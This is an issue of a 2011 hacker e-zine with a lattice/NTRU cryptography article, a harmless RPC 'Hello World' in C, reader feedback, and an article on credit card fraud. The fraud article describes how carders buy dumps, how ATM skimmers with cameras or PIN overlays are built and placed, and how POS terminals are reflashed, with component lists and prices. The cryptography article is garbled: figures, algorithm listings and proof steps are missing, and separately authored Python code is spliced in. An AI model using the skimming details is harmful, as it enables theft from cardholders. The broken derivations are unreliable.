Go Null Yourself E-Zine
Issue #4 - Spring/April 2011
www.GoNullYourself.org
"It makes sense if you don't think about it"

0x01 Introduction                                  || 0x08 MapReduce, Part 2         elchupathingy
0x02 Feedback + Edits                              || 0x09 Cameras + DVRs Scan       storm
0x03 Lattice-Based Cryptography        rattle      || 0x0a 303-833-00xx Scan         Shadytel, Inc
0x04 duper's Code Corner               duper       || 0x0b bit.ly Shenanigans        Silks, elchupa
0x05 The Tech Behind Credit Cards      K141        || 0x0c Programming Challenge     storm
0x06 Brief Notes on Kiosk Hacking      storm       || 0x0d The Scoop on LIGATT
0x07 Linux Rootkit Dev Update          duper       || 0x0e Et Cetera, Etc.           teh crew

[==================================================================================================]

-=[ 0x01 Introduction

Ahoy there, and welcome to issue #4 of GNY Zine - just in time for spring!
The sun is shining, the birds are chirping, and with the advent of laptops, now all you little h4xx0rs have no excuse not to go outside! For those who still prefer the cool depths of a basement, though, GNY Zine has all you need in lieu of vitamin D and a social life. Like crypto! And rootkits! And leet ASCII art!

We may not have iced tea, but here's a recipe to make up for it:

* 8 cups water
* 3 orange pekoe tea bags
* 3/4 cup SPLENDA® No Calorie Sweetener, Granulated
* 1/2 cup lemon juice

1. In a large saucepan, heat water to a rapid boil. Remove from heat and drop in the tea bags. Cover and let steep for 1 hour.
2. In a large pitcher, combine the steeped tea and the SPLENDA® Granulated Sweetener. Stir until dissolved, then stir in lemon juice. Refrigerate until chilled.

Hey, it got quite a few good reviews and only has 11 Calories.

Anyways, don't want to keep you. Those 3100 lines below aren't gonna read themselves. Enjoy the zine, and see ya in the summer.

Notable Events
==============

January 2011       - Leak of LIGATT Security/Gregory D. Evans
January 31, 2011   - Go Null Yourself turns 3-years-old
February 3, 2011   - Exhaustion of remaining IPv4 address space
February 2011      - Leak of HBGary, Inc.

-=-=-

Now, on to formalities...

If you are interested in submitting content for future issues of GNY Zine, we would be happy to review it for publication. Content may take many forms, whether it be a paper, review, scan, or first-hand account of an event. Submissions of ASCII cover art that display the GNY logo in some way are also appreciated. Well-received topics include computer hacking and exploitation methods, programming, telephone phreaking (both analog and digital), system and network exploration, hardware hacking, reverse engineering, amateur radio, cryptography and steganography, and social engineering.
We are also receptive to content relating to concrete subjects such as science and mathematics, along with more abstract subjects such as psychology and culture. Both technical and non-technical material is accepted.

Submissions of content, suggestions for and criticisms of the zine, and death threats may be sent via:

- IRC private message (storm, m0nkee, or Barney- @ irc.gonullyourself.org #gny)
- Email (zine@gonullyourself.org)

If there is enough feedback, we will publish some of the messages in future issues. Our PGP key is available for use below.

We have devoted a lot of effort into this publication and hope that you learn something from reading it. Abiding by our beliefs, any information within this e-zine may be freely re-distributed, utilized, and referenced elsewhere, but we do ask that you keep the articles fully intact (unless citing certain passages) and give credit to the original authors when and where necessary.

Go Null Yourself, its staff members, and the authors of GNY Zine are not responsible for any harm or damage that may result from the information presented within this publication. Although people will be people and act in idiotic fashions, we do not condone, promote, or participate in illegal behavior in any way.
[==================================================================================================]

-=[ 0x02 Feedback and Edits

We always strive to publish accurate information in GNY Zine, but we the authors and editors are in fact human beings and are subject to making mistakes from time to time, despite our best efforts. The publication, compilation, and distribution of this e-zine is derived entirely from our passion for technology and curiosity about how things tick. GNY Zine has no commercial influences.

If you find that there is an error in content that we have published, please do not hesitate to email us so that it may be announced and corrected in the next issue. Not acting like a stuck-up elitist about it will probably invoke a more positive response too.
With that being said, we are also receptive to content or personal experiences relevant to information presented in past issues. If you've written some code, applied a concept in a new way, or just want to voice your opinion about a topic, send us an email!

We may be contacted at: zine@gonullyourself.org (PGP key is available in the Introduction)

Please note that emails we like will be published in future issues, so specify if you wish for your message to remain private or if you wish for us to redact certain personal information from it.

----------------------------------------------------------------------------------------------------

Turning Manning into the Feds turns an institution with relatively unlimited power against Manning. The techniques used by Lamo were a betrayal of trust given (arguably without having been earned) to Lamo. Lamo is a snitch by definition. The fact that he still has hosting on domains like resist.ca is further evidence that resist.ca can not be trusted as an anarchist resource.

The panel at HOPE in which Lamo was confronted framed the hacker community as one that is filled with snitches. Members of the panel told stories about how they were turned in by people they collaborated with and trusted. Behavior like this closes doors to the flow of information, welcomes the violence of authoritarian institutions, and sets the foundation for the privatization of security research. Behavior like Lamo's is in opposition to the safety and values of the hacker community, and as a result should not be allowed space. Idolizing individuals who act with such a disregard for the hacker community they claim to be a part of with a glowing expose is a disgrace to the hacker community.

With disgust,
evoltech

>> Thanks for sending us your opinion. Though, we checked and it seems like Adrian's website is
>> currently 404'ing (for those of you who didn't read the interview from issue #2, the URL is
>> http://users.resist.ca/~adrian/).
>> We actually followed up on this and contacted resist.ca about
>> it, who replied:

Hi there,

Sorry we haven't responded to you yet about your question about Adrian Lamo's website on resist.ca. We removed his various accounts because his motivations seem to be in conflict with ours (see http://www.youtube.com/watch?v=ebLahUUr__s). Our project is politically motivated and we offer services to projects that share our political alignment. Adrian's activities around the wikileaks debacle suggest to us that he doesn't actually align with us politically. For more information on the kinds of political activism we support, please read our mission statement at http://resist.ca/mission and our basis of unity at http://resist.ca/basis

--The resist.ca collective

>> So, there you go.

[==================================================================================================]

-=[ 0x03 Lattice-Based Cryptography
-=[ Author: rattle
-=[ Website: http://www.awarenetwork.org/

                              p o s t - q u a n t u m
                         A Lattice-Based Crypto System
                              rattle // born // tobi

-- 0 Requirements --------------------------------------------------------------

I will expect readers to have a basic grasp of (linear) algebra. The terms I will use without further explanation are the following:

- vector
- linear independence
- matrix
- rank of a matrix
- transpose of a matrix
- scalar products
- quotient rings Z(q) = { 0, ..., q-1 } (where all operations are performed modulo q)

I also expect the reader to have a certain idea of computational complexity, if even only the roughest. You should have heard of the following notions:

- Big-O notation (Landau symbols)
- Time/Space complexity of an algorithm

I really can not give a complete introduction to these topics here.
I would recommend literature, but all the undergraduate books on these topics that I know are in German.

---- 0.1 Notation --------------------------------------------------------------

When A is some (n x m)-matrix (this means it has n rows and m columns), then the entry in the i-th row and j-th column is denoted by A[i,j]. Similarly, if a is a vector (which is just an (n x 1)-matrix), we will denote the i-th entry of this vector by a[i]. The transpose of a matrix A is denoted by A°.

The canonical basis of real space will be denoted by e(1)...e(n), which are the vectors defined by e(i)[j]=1 <=> i=j and e(i)[j]=0 otherwise.

We will denote the real numbers by R, the integer numbers by Z. The notation X^n is to be read as "X to the n" and denotes Cartesian powers if X is a set, otherwise it means multiplying X with itself n times, duh.

In real space, if a and b are vectors, we denote by = a[1]·b[1] + ··· + a[n]·b[n] the Euclidean scalar product.

-- 1 Introduction --------------------------------------------------------------

Given linearly independent vectors B[1],...,B[n] in R^n, the lattice spanned by these vectors is the set

   L = { a[1]·B[1] + ... + a[n]·B[n] | a in Z^n }

of all integer linear combinations of them. The following is an example in R^2: Each lattice point is marked by an x and the 'grid' has been ASCII-modelled for your convenience.

   Figure 1: Example of a two-dimensional Lattice

Now, consider the following picture. We have added a "target" vector (marked €) and a circle around it intersecting the closest lattice point, which is p=(5,3) in this case.
   Figure 2: Lattice with target vector

Using the basis a=(4,1) and b=(1,2), it is easy to see that p = a + b. On the other hand, using the basis c=(18,1) and d=(7,0), the same point has the less simple description p = 3·c - 7·d. When passing to higher dimensions, this phenomenon escalates drastically. This way, we obtain a computational problem that varies from easy to virtually impossible to solve, depending very much on the lattice basis used.

---- 1.1 Lattice Problems ------------------------------------------------------

Let L be a lattice and g some real value greater than or equal to one. We denote by d(x,y) the distance from the point x to the point y. The lattice approximation problems are the following:

CLOSEST VECTOR PROBLEM -- CVP(g): For any vector t in R^n, let y be the lattice point closest to t. The task is to find a lattice point x not equal to t such that d(x,t) is less than or equal to g·d(y,t). In other words, x is no further from t than g times the distance from t to any lattice point.

SHORTEST VECTOR PROBLEM -- SVP(g): Find a vector x such that x is no longer than g times the shortest lattice vector. This is the special case of the CVP where t=(0,...,0) is the origin.

We also write SVP = SVP(1) and CVP = CVP(1) for the non-approximative problems.

---- 1.2 Lattice-based Encryption: Breakdown -----------------------------------

Based on these problems, we can build an asymmetric cryptosystem, which is roughly described as follows:

a) Choose a random "good" basis and keep it as a private key.
b) Hand out a "bad" basis for the same lattice as a public key.
c) Somehow find a way to encode your messages as lattice points.
d) Encrypt a lattice point by simply distorting it randomly by a small vector.
e) Decryption now means that you have to find the lattice point closest to the distorted vector (because it was the original message). This is now equivalent to solving the CVP, which should only be possible when in possession of a "good" basis.

---- 1.3 Analysis of SVP -------------------------------------------------------

We now give a brief historical analysis of the hardness of the SVP(g) - one should note here that the CVP(g) is harder than the SVP(g), therefore it would suffice if the SVP(g) was hard to solve. And indeed, from the algorithms known so far, it seems that we can either achieve a polynomial runtime or a polynomial approximation factor, but not both:

   +--------+--------------+--------+-------------------------------------+
   | g      | Runtime      | Space  | Reference                           |
   +--------+--------------+--------+-------------------------------------+
   | 1      | 2^O(n)       | 2^O(n) | [JHLW11, Combinatorial SVP-Solver]  |
   | 1      | 2^O(n log n) | poly   | [Kan83]                             |
   | poly   | 2^O(n)       | 2^O(n) | [MR09]                              |
   | 2^O(n) | poly         | ?      | [LLL82]                             |
   +--------+--------------+--------+-------------------------------------+

This has led to the following conjecture:

Conjecture 1.1. There is no polynomial time algorithm that approximates lattice problems to within polynomial factors.
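The easy/hard contrast of Figure 2 and decryption step e) above, worked through with Babai's round-off (write the target in basis coordinates, round to the nearest integers, map back). This is an added example, not part of rattle's article: the two bases are the ones from the figure, and the target position (5.4, 3.3) near p=(5,3) is an assumption, since the text does not give its coordinates.

```python
from fractions import Fraction
import math

# Constructed example: the two bases of Figure 2 (a, b = "good"; c, d = "bad")
# and a target point near p = (5, 3). The target's exact position is an assumption.
GOOD = ((4, 1), (1, 2))
BAD = ((18, 1), (7, 0))
TARGET = (Fraction(27, 5), Fraction(33, 10))   # (5.4, 3.3)


def solve2(basis, t):
    """Exact coordinates (x, y) with x·b1 + y·b2 = t, by Cramer's rule."""
    (a1, a2), (b1, b2) = basis
    det = Fraction(a1 * b2 - a2 * b1)
    if det == 0:
        raise ValueError("basis vectors are linearly dependent")
    x = (Fraction(t[0]) * b2 - Fraction(t[1]) * b1) / det
    y = (Fraction(a1) * t[1] - Fraction(a2) * t[0]) / det
    return x, y


def same_lattice(basis1, basis2):
    """Two bases span the same lattice iff every vector of each one has integer
    coordinates with respect to the other."""
    def integral(basis, vec):
        return all(c.denominator == 1 for c in solve2(basis, vec))
    return (all(integral(basis1, v) for v in basis2)
            and all(integral(basis2, v) for v in basis1))


def babai_roundoff(basis, t):
    """Babai's round-off: nearest-integer coordinates in the given basis.
    Returns (lattice point, integer coefficients)."""
    (a1, a2), (b1, b2) = basis
    kx, ky = (round(c) for c in solve2(basis, t))
    return (kx * a1 + ky * b1, kx * a2 + ky * b2), (kx, ky)


def dist2(u, v):
    """Squared Euclidean distance, kept exact with Fractions."""
    return (u[0] - v[0]) ** 2 + (u[1] - v[1]) ** 2


def hadamard_ratio(basis):
    """|det B| / (|b1|·|b2|): 1 for an orthogonal basis, close to 0 for a skewed
    ("bad") one. The larger it is, the more reliable round-off becomes."""
    (a1, a2), (b1, b2) = basis
    return abs(a1 * b2 - a2 * b1) / (math.hypot(a1, a2) * math.hypot(b1, b2))


def compare(t=TARGET):
    """Round-off with both bases; returns {name: (point, coefficients, dist^2)}."""
    out = {}
    for name, basis in (("good", GOOD), ("bad", BAD)):
        pt, coeffs = babai_roundoff(basis, t)
        out[name] = (pt, coeffs, dist2(pt, t))
    return out


if __name__ == "__main__":
    assert same_lattice(GOOD, BAD)          # same lattice, different bases
    for name, (pt, coeffs, d2) in compare().items():
        print(f"{name:4} basis: coefficients {coeffs} -> point {pt}, "
              f"dist^2 = {float(d2):.2f}, Hadamard ratio "
              f"{hadamard_ratio(GOOD if name == 'good' else BAD):.3f}")
```

With the good basis the rounding lands on p=(5,3) (coefficients (1,1)); with the bad basis the same target rounds to coefficients (3,-8) instead of (3,-7) and ends up at (-2,3), more than seven units away.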
As far as exponential-time exact solvers are concerned, they have become practical even for small instances just in recent years:

   +------+-------------------------+----------+-----------+
   | Year | Authors                 | Time     | Space     |
   +------+-------------------------+----------+-----------+
   | 2001 | Ajtai, Kumar, Sivakumar | 2^O(n)   | 2^O(n)    |
   | 2004 | Regev                   | 2^(16n)  | 2^(8n)    |
   | 2008 | Nguyen, Vidick          | 2^(5.9n) | 2^(3n)    |
   | 2010 | Pujol, Stehlé           | 2^(2.5n) | 2^(1.2n)  |
   +------+-------------------------+----------+-----------+

One should note, however, that lattice reduction methods such as [LLL82] seem to perform better in practice than their theoretic worst-case guarantees suggest. This is not fully explained yet, but has experimental evidence: In [GN08], different algorithms and several distributions on lattices were compared, with the result that they provide an approximation ratio of roughly g=d^n where d is close to 1.012. Still, it seems that approximation ratios of (1.01)^n are outside the reach of known lattice reduction algorithms.

We should note that for

           __________
          /    n
   g >   / --------
       \/   log(n)

the SVP(g) is not NP-hard unless the polynomial time hierarchy collapses (you should read this as "is not NP-hard"). However, it was shown in [Ajt98] that the SVP=SVP(1) actually is NP-hard. Furthermore, there are no quantum algorithms known that perform better than the classical ones. Because of this, lattice-based cryptography is often labelled "post-quantum" cryptography. In summary, we may very well assume that the SVP is a hard problem.

-- 2 NTRU ----------------------------------------------------------------------

We will now present a practical implementation of the rough idea presented in subsection 1.2. For the mathematically inclined, a detailed explanation of why the encryption scheme really works the way we outlined in 1.2 can be found in [JHLW11].
---- 2.1 Mathematical Necessities ----------------------------------------------

We first require a couple of mathematical definitions and results, since NTRU operates on a very special kind of lattice.

Definition 2.1. Let Z(q) = {0,...,q-1} be the integer numbers from 0 to q-1, with all operations performed modulo q. We denote by p: Z --> Z(q) the map that sends any number n to (n mod q). When A is a matrix with integer entries, we denote by p(A) the matrix with entries in Z(q) which is obtained by reducing all entries modulo q.

Definition 2.2. Let v in R^n be a vector and A an (n x n)-matrix. We then define the matrix

               / v[1]   (A·v)[1]   ···   (A^(n-1)·v)[1] \
               |  ·        ·                    ·       |
   (A*v)  :=   |  ·        ·                    ·       |
               |  ·        ·                    ·       |
               \ v[n]   (A·v)[n]   ···   (A^(n-1)·v)[n] /

whose i-th column is the result of applying A exactly (i-1) times to v. We also define the special (n x n)-matrix

               / 0  0  ·  ·  0 | 1 \
               |---------------+---|
               | 1  0  ·  ·  0 | 0 |
   T      :=   | 0  1  ·     · | · |
               | ·     ·  ·  · | · |
               | ·        ·  0 | · |
               \ 0  ·  ·  0  1 | 0 /

and will make frequent use of the matrix (T*v), which is the matrix whose i-th column is just v, rotated by i.

Lemma 2.3. For any two vectors f and g,

   1) (T*f)·g = (T*g)·f
   2) T·(T*f) = (T*f)·T
   3) (T*f)·(T*g) = (T*((T*f)·g))

Proof. Consider the (k x k)-matrices

               / 0  ·  ·  0  1 \
               | ·        ·  0 |
   I(k)   :=   | ·     ·     · |
               | 0  ·        · |
               \ 1  0  ·  ·  0 /

and the symmetrical (n x n)-matrices

               / I(k) |   0    \
   S(k)   :=   |------+--------|
               \  0   | I(n-k) /

Then, we have

               / g[1]   g[n]    ··  g[2] \          / h[1] \
               | g[2]   g[1]    ··  g[3] |          | h[2] |
   (T*g)·f  =  |  ·      ·           ·   |  · f  =  |  ·   |  =: h
               |  ·      ·           ·   |          |  ·   |
               \ g[n]   g[n-1]  ··  g[1] /          \ h[n] /

And clearly, (T*f)·g = h. This proves part (1) already.
For the second statement, we calculate (all index operations are performed modulo n):

      __ n
   =  >     (S(i-1)·f)[k] · ((T^j)·g)[k]
      ¯¯ k=1

      __ i-1                       __ n
   =  >     f[i-k]·g[k-j]     +    >     f[n+i-k]·g[k-j]
      ¯¯ k=1                       ¯¯ k=i

      __ i                         __ n+1
   =  >     f[i-k+1]·g[k-j-1]  +   >     f[n+i-k+1]·g[k-j-1]
      ¯¯ k=2                       ¯¯ k=i+1

      __ i                         __ n
   =  >     f[i-k+1]·g[k-j-1]  +   >     f[n+i-k+1]·g[k-j-1]
      ¯¯ k=1                       ¯¯ k=i+1

   =

which yields

         / · \     / · \     / · \
   T ·   | · |  =  | · |  =  | · |
         \ · /     \ · /     \ · /

and therefore,

                                   / · \
   T^(j-1) · h  =  (T*h)_j  =      | · |.
                                   \ · /

With this, it is now obvious that

                   / f[1]  f[n]    · ·  f[2] \     / g[1]  g[n]    · ·  g[2] \
                   | f[2]  f[1]    · ·  f[3] |     | g[2]  g[1]    · ·  g[3] |
   (T*f)·(T*g)  =  |  ·     ·            ·   |  ·  |  ·     ·            ·   |  =  (T*h).
                   |  ·     ·            ·   |     |  ·     ·            ·   |
                   \ f[n]  f[n-1]  · ·  f[1] /     \ g[n]  g[n-1]  · ·  g[1] /

q.e.d.

Definition 2.4. Let n and d be positive integer numbers and d < n. A vector f in Z^n is called a d-vector if it has exactly d negative and d+1 positive entries.

---- 2.2 The NTRU Cryptosystem -------------------------------------------------

We can now describe the process of key generation for the NTRU cryptosystem:

________________________________________________________________________________
Algorithm 1: NTRU-KEY-GENERATION
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Input: A prime number n, a "modulus" q, a "weight bound" d and an integer p

           __ n
   v[i] =  >    ( (T*f)[i,j]·m[j] + (T*g)[i,j]·r[j] )
           ¯¯ j=1

           __ n
        =  >    ( (T^(j-1)·f)[i]·m[j] + (T^(j-1)·g)[i]·r[j] )
           ¯¯ j=1

           __ n
        =  >    ( f[i-j+1]·m[j] + g[i-j+1]·r[j] )
           ¯¯ j=1

We write f' := f - e(1), which is the vector chosen in step 1 of the NTRU-KEY-GENERATION algorithm. Estimating the absolute value of v[i], it is maximized for

   f'[i-j+1] = -p if m[j] = -1            g[i-j+1] = -p if r[j] = -1
                p if m[j] =  1     and                 p if r[j] =  1

Since f = f' + e(1), we get

   |v[i]| <= (2d+1)·p + (2d+1)·p + 1 = 4dp + 2p + 1,

yielding (#), if we want the absolute values of v to be bounded by q/2; q.e.d.
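The algorithm listings of 2.2 are incomplete above, so here is an added toy instance (not rattle's code) of the scheme that the bound (#) protects: f = e(1) + p·f' and g = p·g' with f', g' d-vectors, public key h = f^(-1)·g mod q, ciphertext c = (T*h)·r + m mod q for a random d-vector r, and decryption v = (T*f)·c reduced mod q (centred) and then mod p. The parameters n=53, q=257, p=3, d=5 and the use of a prime q (so that f^(-1) can be found by Gauss-Jordan elimination rather than the usual power-of-two modulus) are assumptions; 4dp+2p+1 = 67 < q/2 holds as (#) requires.

```python
import random


def conv(f, g, n):
    """(T*f)·g as a cyclic convolution: entry i is the sum over j of f[i-j]·g[j], indices mod n."""
    h = [0] * n
    for i in range(n):
        if f[i]:
            for j in range(n):
                h[(i + j) % n] += f[i] * g[j]
    return h


def solve_mod(M, b, q):
    """Solve M·x = b over Z(q), q prime, by Gauss-Jordan; None if M is singular mod q."""
    n = len(M)
    A = [[x % q for x in row] + [b[i] % q] for i, row in enumerate(M)]
    for col in range(n):
        piv = next((r for r in range(col, n) if A[r][col]), None)
        if piv is None:
            return None
        A[col], A[piv] = A[piv], A[col]
        inv = pow(A[col][col], -1, q)
        A[col] = [(x * inv) % q for x in A[col]]
        for r in range(n):
            if r != col and A[r][col]:
                fac = A[r][col]
                A[r] = [(x - fac * y) % q for x, y in zip(A[r], A[col])]
    return [row[n] for row in A]


def inverse(f, n, q):
    """f^(-1) mod q: the x with (T*f)·x = e(1) mod q, or None if f is not invertible."""
    circulant = [[f[(i - j) % n] for j in range(n)] for i in range(n)]  # the matrix (T*f)
    return solve_mod(circulant, [1] + [0] * (n - 1), q)


def d_vector(n, d, rng):
    """Definition 2.4: exactly d entries equal to -1 and d+1 equal to +1, the rest 0."""
    v = [1] * (d + 1) + [-1] * d + [0] * (n - 2 * d - 1)
    rng.shuffle(v)
    return v


def centre(x, q):
    """Representative of x mod q in the range (-q/2, q/2]."""
    x %= q
    return x - q if x > q // 2 else x


def bound_ok(q, p, d):
    """Condition (#): 4dp + 2p + 1 < q/2, which makes the centred lift in decrypt() exact."""
    return 4 * d * p + 2 * p + 1 < q / 2


def keygen(n, q, p, d, rng):
    """Private key (f, g) with f = e(1) + p·f', g = p·g' for d-vectors f', g';
    public key h = f^(-1)·g mod q."""
    if not bound_ok(q, p, d):
        raise ValueError("parameters violate (#): decryption would not be guaranteed")
    while True:
        f = [p * x for x in d_vector(n, d, rng)]
        f[0] += 1                                  # f = e(1) + p·f'
        f_inv = inverse(f, n, q)
        if f_inv is not None:                      # retry if f happens to be singular mod q
            break
    g = [p * x for x in d_vector(n, d, rng)]
    h = [x % q for x in conv(f_inv, g, n)]
    return (f, g), h


def encrypt(h, m, n, q, d, rng):
    """c = (T*h)·r + m mod q for a fresh random d-vector r; m has entries in {-1, 0, 1}."""
    r = d_vector(n, d, rng)
    return [(x + y) % q for x, y in zip(conv(h, r, n), m)]


def decrypt(f, c, n, q, p):
    """v = (T*f)·c = (T*g)·r + (T*f)·m holds over Z after the centred lift, by (#);
    f = e(1) mod p, so reducing v mod p (centred) leaves exactly m."""
    v = [centre(x, q) for x in conv(f, c, n)]
    return [centre(x, p) for x in v]


def roundtrip(n=53, q=257, p=3, d=5, seed=1):
    """Generate keys, encrypt a random message, decrypt it; returns (m, recovered)."""
    rng = random.Random(seed)
    (f, g), h = keygen(n, q, p, d, rng)
    m = [rng.choice((-1, 0, 1)) for _ in range(n)]
    c = encrypt(h, m, n, q, d, rng)
    return m, decrypt(f, c, n, q, p)


if __name__ == "__main__":
    m, recovered = roundtrip()
    print("n=53 q=257 p=3 d=5  ->  message recovered:", m == recovered)
```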
-- 3 Further Reading -----------------------------------------------------------

If you would like to read the full-blown math article, it is reference [JHLW11] and the URL to the PDF is given below.

---- 3.1 References ------------------------------------------------------------

[LLL82]  A.K. Lenstra, H.W. Lenstra and L. Lovász, Factoring polynomials with rational coefficients, Math. Ann. 261 (1982), 515-534.
[Kan83]  R. Kannan, Improved algorithms for integer programming and related lattice problems, Proc. 15th ACM Symp. on Theory of Computing (STOC) (1983), 193-206.
[Ajt98]  M. Ajtai, The shortest vector problem in L2 is NP-hard for randomized reductions, Proc. 30th STOC, ACM (1998), 10-19.
[GN08]   N. Gama and P.Q. Nguyen, Predicting lattice reduction, Advances in Cryptology, Proc. Eurocrypt '08, Lecture Notes in Computer Science, Springer (2008).
[MR09]   D. Micciancio and O. Regev, Lattice-based Cryptography, chapter in: D.J. Bernstein, J. Buchmann and E. Dahmen (eds.), Post-Quantum Cryptography, 147-191, Springer (2009).
[JHLW11] J. Huettenhain and L.A. Wallenborn, Lattice-Based Methods, Seminar Topics in Post-Quantum Cryptography (2011), http://www.uni-bonn.de/~rattle/works/lattices.pdf

-----------------------------------------------------------------------[ eof ]--

[==================================================================================================]

-=[ 0x04 duper's Code Corner
-=[ Author: duper
-=[ Website: http://projects.ext.haxnet.org/~super/

/**
 * Code for creating the client and server sides of a Transport
 * Independent Remote Procedure Call "Hello World" in Linux
 *
 * i.e. not based on the SunRPC code of glibc
 *
 * Super-user access is not required, only a running portmapper.
 */

/**
 * gcc -I/usr/include/tirpc -o create-tcp-rpc-server create-tcp-rpc-server.c -ltirpc
 */
#include <stdio.h>
#include <stdlib.h>
#include <rpc/rpc.h>
#include <rpc/svc_soc.h>     /* svctcp_create() */

/* Report the failing libc call and exit. */
void vexit(const char *funcname)
{
  perror(funcname);
  exit(EXIT_FAILURE);
}

/* Invoked by svc_run() for each request to program 101337, version 1. Appends a
 * line to a file and sends back an int so the client's rpc_call() returns
 * RPC_SUCCESS instead of timing out. */
void dispatch(struct svc_req *request, SVCXPRT *xprt)
{
  int result = 0;
  FILE *afile = fopen("/tmp/a.txt", "a");

  (void)request;
  if(!afile)
    vexit("fopen");

  fputs("Hello World!\n", afile);
  fclose(afile);

  if(!svc_sendreply(xprt, (xdrproc_t)xdr_int, (char *)&result))
    svcerr_systemerr(xprt);
}

int main(void)
{
  /* RPC_ANYSOCK: let the library open the socket; 0, 0: default buffer sizes */
  SVCXPRT *svcxprt = svctcp_create(RPC_ANYSOCK, 0, 0);

  if(!svcxprt)
    vexit("svctcp_create");

  printf("xp_sock: %d\n", svcxprt->xp_sock);
  printf("xp_port: %d\n", svcxprt->xp_port);

  /* IPPROTO_TCP makes svc_register() announce the program to the portmapper. */
  if(svc_register(svcxprt, 101337, 1, dispatch, IPPROTO_TCP) != 1)
    vexit("svc_register");

  svc_run();    /* never returns */
  exit(EXIT_SUCCESS);
}

/**
 * gcc -I/usr/include/tirpc -o create-tcp-rpc-client create-tcp-rpc-client.c -ltirpc
 */
#include <stdio.h>
#include <stdlib.h>
#include <rpc/rpc.h>

/* Report the RPC status and exit. */
void clnt_vexit(enum clnt_stat value)
{
  clnt_perrno(value);
  exit(EXIT_FAILURE);
}

int main(void)
{
  /* xdr_int (de)serializes an int, so the argument and the result must be real
   * int storage, not string literals (writing into a literal would crash). */
  int in = 0, out = 0;

  /* host, program, version, procedure, arg XDR, arg, result XDR, result, nettype */
  enum clnt_stat s = rpc_call("192.168.1.113", 101337, 1, 1,
                              (xdrproc_t)xdr_int, (char *)&in,
                              (xdrproc_t)xdr_int, (char *)&out, "tcp");

  if(s != RPC_SUCCESS)
    clnt_vexit(s);

  printf("server replied: %d\n", out);
  exit(EXIT_SUCCESS);
}

[==================================================================================================]

-=[ 0x05 The Tech Behind Credit Card Fraud
-=[ Author: K141

[[ Introduction ]]
---------------

Plastics carding is by far the most profitable type of credit card fraud - the replication, or spoofing, of magnetic stripe data onto a secondary medium (a magstripe card) being the most common form. I have written this paper to address the procedures criminals follow, explaining each step as basically as possible. There are numerous papers and articles released that do not even touch the issues at hand: how these criminals obtain this information and, more generally, who does what in the spectrum of physical carding.
While 'physical carding' or plastics carding is dwarfed by the volume of virtual/online carding done, it still stands as a major contender. Technologies exist which could eradicate this type of attack; however, we see no intention of this from the banks as it involves critical changes to the current infrastructure. To date, I see no tech-related reason why this form of fraud is still allowed to be committed.

[[ Track Data ]]
------------

Within a credit card (a high-coercivity magnetic stripe card), there exist 3 tracks of data (3 sections that are capable of storing data separately). This paper will cover the logical side of magstripe encoding (all 3 tracks and relevant data) and not the physical, that is, the widths of each track, polarities and coercivity. After reading, you should be more familiar with the processes involved in how criminals obtain and handle this data to produce profits.

The majority of the time, Track 1 data is not needed for cashing out with plastics. This is the information that will be shown on the receipt and/or POS (point-of-sale) terminal. There exist some terminals, though, that require Track 1 to be present, and a good attacker (or 'carder') will always fill their Track 1 field. Luckily for the attacker, Track 1 can be generated entirely from Track 2 data. It is important to mention that Track 1 is derived from the information on Track 2 and is often used as a fail-safe if Track 2 is not or can not be read. This is also the only track that accepts alphanumeric characters.

Track 2 data is the most important for 'cashing out'. This is where the relevant information for generating Track 1 data is held, as well as other data that allows a transaction to occur.

Track 3 data, mostly, is null.

Before a transaction may occur, a PIN is necessary for authentication. With that said, generally speaking, Track 2 data + PIN = the ability to cash out with that card.
[[ Obtaining Track Data ]]
-----------------------

On many hacking/carding forums, there exist endless advertisements of "Dumps + PINs for sale". These sellers, the majority of the time, are fraudulent (oh, irony) and will request a large 'minimum amount' in order to successfully defraud at least $300 or so to make the scam worth their while. If a seller is genuine and is selling Track 2 data + PINs (a rarity, but it does occur), he/she knows the balance of the said account and knows it to be low. There do exist some legitimate sellers; however, the data they sell is typically Track 2 only and can only be cashed out by a minority of the carding community.

That being said, online vendors are not the only source of 'dumps'. An assailant may obtain Track 2 data with PINs by either building or buying their own card skimmer.

[[ ATM Skimming ]]
--------------

A 'skimmer' device is typically placed over the mouth of a genuine ATM in order to steal track data before the card is legitimately read by the machine. As the victim's credit card is entered into the ATM, it passes through the false fascia (the skimming device) and the Track 2 section passes over the Track 2 read head, stealing the information. As it only passes over the read head, the card is still able to enter the ATM, and the machine offers the same functionality as an un-tampered ATM.

If the skimming device is coupled with a miniature camera, it will take this Track 2 data, parse it into a file on its storage medium, and also timestamp this data for later reference against the timestamped video footage of PIN entry. These skimmers must then be collected from the ATM after the attack is complete (usually during the early hours of the morning to avoid detection, or when the battery has run low).
If the skimming device is coupled with a PIN-pad overlay, it will transmit Track 2 data and PIN via SMS or Bluetooth to the attacker's phone, reducing the risk of the attacker being caught and concurrently allowing remote operation. These skimmers will only need to be re-visited when the battery runs low.

An ATM skimming device is comprised of a few components:

- Fascia: To overlay the ATM mouth without suspicion.
- T2 Read Head: A small device to read the Track 2 data from the magnetic stripe card. Note, ideally a skimmer will read only one track of information, so as to keep the size of the device minimal.
- Custom printed PCB: This parses the data taken from the Track 2 head and stores it to addressed memory locations, usually a Micro-SD card, or passes it to the Bluetooth module.
- Bluetooth module (optional): A Bluetooth or SMS module is often used for remotely transmitting Track 2 data, along with PINs, back to the carder.
- Battery: To power the device.

The components required to build these devices are inexpensive, but the main obstacle to building a skimmer is technical know-how. I have found the price of pre-built skimmers currently to range from $600-$8000, as opposed to $100-700 in building costs.

[[ POS Skimming ]]
--------------

Point of sale skimming is a software-based attack in which the firmware of the POS terminal is flashed, rather than a physical device being inserted. Common models are the VeriFone Vx510 and various Ingenico devices. These skimmers are mostly 'offline' skimmers, in which the target will believe he/she is making a purchase with their card, and a transaction will appear to process along with a receipt print, but no charge will actually occur. Instead, the card has just been swiped and the target has entered their PIN. A flashed firmware can be programmed to output a later receipt with all three track details, as well as the PIN, or designed to save to file for later use.
These skimmers are usually deployed in stores with the store owner's knowledge, as he/she may be forced to comply or offered a percentage of all money made. An attacker wishing to purchase a chipped/flashed POS terminal can expect to pay $1000. All dumps are encrypted, with the seller holding the encryption key. This forces the buyer to return to the seller, send the encrypted file, and in return receive only a percentage of the original skimmed cards. Alternatively, these skimmers can be bought outright for as much as $3,000-10,000.

[[ Obtaining Track Data Through Malware ]]
--------------------------------------

